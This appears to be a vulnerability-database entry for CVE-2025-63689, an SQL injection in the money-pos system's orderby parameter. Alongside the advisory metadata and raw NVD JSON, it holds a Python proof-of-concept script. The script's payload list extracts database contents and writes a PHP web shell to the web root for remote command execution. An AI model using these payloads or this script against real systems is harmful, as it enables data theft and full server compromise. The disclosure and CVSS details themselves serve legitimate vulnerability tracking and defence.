Security Vulnerability Report
中文
CVE-2025-63689 CVSS 10.0 CRITICAL

CVE-2025-63689

Published: 2025-11-07 16:15:43
Last Modified: 2026-02-05 16:25:52
Source: [email protected]

Description

Multiple SQL injection vulnerabilitites in ycf1998 money-pos system before commit 11f276bd20a41f089298d804e43cb1c39d041e59 (2025-09-14) allows a remote attacker to execute arbitrary code via the orderby parameter

CVSS Details

CVSS Score
10.0
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:ycf1998:money-pos:*:*:*:*:*:*:*:* - VULNERABLE
ycf1998 money-pos < commit 11f276bd20a41f089298d804e43cb1c39d041e59 (2025-09-14)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-63689 SQL Injection PoC # Target: ycf1998 money-pos system < commit 11f276bd20a41f089298d804e43cb1c39d041e59 def exploit(target_url, orderby_payload): """ SQL Injection via orderby parameter """ # Construct malicious request params = { 'orderby': orderby_payload } try: response = requests.get( f'{target_url}/api/endpoint', params=params, timeout=10 ) return response.text except requests.exceptions.RequestException as e: return f'Error: {e}' # Example payloads payloads = [ # Extract database version '1 UNION SELECT NULL,version(),NULL--', # Extract database name '1 UNION SELECT NULL,database(),NULL--', # Extract all table names '1 UNION SELECT NULL,group_concat(table_name),NULL FROM information_schema.tables WHERE table_schema=database()--', # File write for RCE "1' INTO OUTFILE '/var/www/html/shell.php' LINES TERMINATED BY '<?php system($_GET["cmd"]); ?>'--" ] if __name__ == '__main__': if len(sys.argv) < 2: print('Usage: python cve-2025-63689.py <target_url>') sys.exit(1) target = sys.argv[1] for payload in payloads: print(f'Testing payload: {payload}') result = exploit(target, payload) print(f'Result: {result}\n')

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-63689", "sourceIdentifier": "[email protected]", "published": "2025-11-07T16:15:42.503", "lastModified": "2026-02-05T16:25:52.370", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Multiple SQL injection vulnerabilitites in ycf1998 money-pos system before commit 11f276bd20a41f089298d804e43cb1c39d041e59 (2025-09-14) allows a remote attacker to execute arbitrary code via the orderby parameter"}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "baseScore": 10.0, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 6.0}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ycf1998:money-pos:*:*:*:*:*:*:*:*", "versionEndExcluding": "2025-09-14", "matchCriteriaId": "B76175F0-5B2C-4FA8-A57E-88FBE99BDC79"}]}]}], "references": [{"url": "https://gist.github.com/LockeTom/2ed0f3751c88542f48b7c230468d2a46", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/ycf1998/money-pos/commit/11f276bd20a41f089298d804e43cb1c39d041e59", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/ycf1998/money-pos/issues/3", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.